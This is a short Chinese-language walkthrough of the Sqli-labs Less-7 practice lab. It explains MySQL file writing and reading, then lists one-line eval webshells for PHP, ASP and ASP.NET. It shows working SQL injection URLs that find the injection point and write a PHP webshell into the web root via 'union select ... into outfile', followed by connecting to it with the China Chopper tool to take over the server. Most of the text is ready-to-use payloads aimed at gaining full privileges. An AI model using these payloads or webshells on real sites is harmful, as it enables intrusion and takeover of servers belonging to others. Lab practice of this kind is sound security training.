知识补充
1.into outfile 写文件
例:select ‘mysql is very good’ into outfile ‘text.txt’;
例:select ‘mysql is very good’ into outfile ‘D:\wamp\www\sql\Less-7\text.txt’;
2.load_file() 读取本地文件
例:select load_file(‘D:\wamp\www\sql\Less-7\text.txt’);
注意事项: \ 一些特别的字符要注意使用转义字符 如:\t 、\n 等。
3.一句话木马(其中caidao是密码)
php版本:<?php @eval($_POST["caidao"]);?> 其中caidao是密码
ASP版本: <%eval request(“caidao”)%>
ASP.NET版本:<%@ Page Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>
——————————分割线——————————————
Sqli-labs-Less-7
查看是否存在注入
当我们使用?id=1时也没有报错,并显示You are in… Use outfile…提示我们使用outfile函数来进行注入
当我们使用?id=1’和?id=1’)报错,不过当我们注释掉时继续报错,说明还是不对
当我们使用?id=1’))报错,不过当我们注释掉时返回正确,说明此处存在注入点
查看有多少列
http://www.web.com/sql/Less-7/?id=1’)) order by 3–+ 返回正确,说明有三列
使用一句话木马
因为我们注入的最终目的是拿到最大权限,在这里使用into outfile 将一句话木马写入并使用中国菜刀连接。
http://www.web.com/sql/Less-7/?id=1’)) union select 1,2,’<?php @eval($_POST["caidao"]);?>’ into outfile ‘D:\wamp\www\sql\Less-7\text1.php’–+
返回错误,但是我们在目录中看文件已经被写入到目录中
使用中国菜刀连接
添加成功
双击拿到权限
攻击完成。
在此我测试能否使用布尔盲注,测试成功,不过无法使用burp进行**,需要自己进行盲猜。效率较慢。
注意:在Sqli-labs-Less-5中是?id=1’
在Sqli-labs-Less-7中是?id=1’))
布尔盲注连接Sqli-labs-Less-5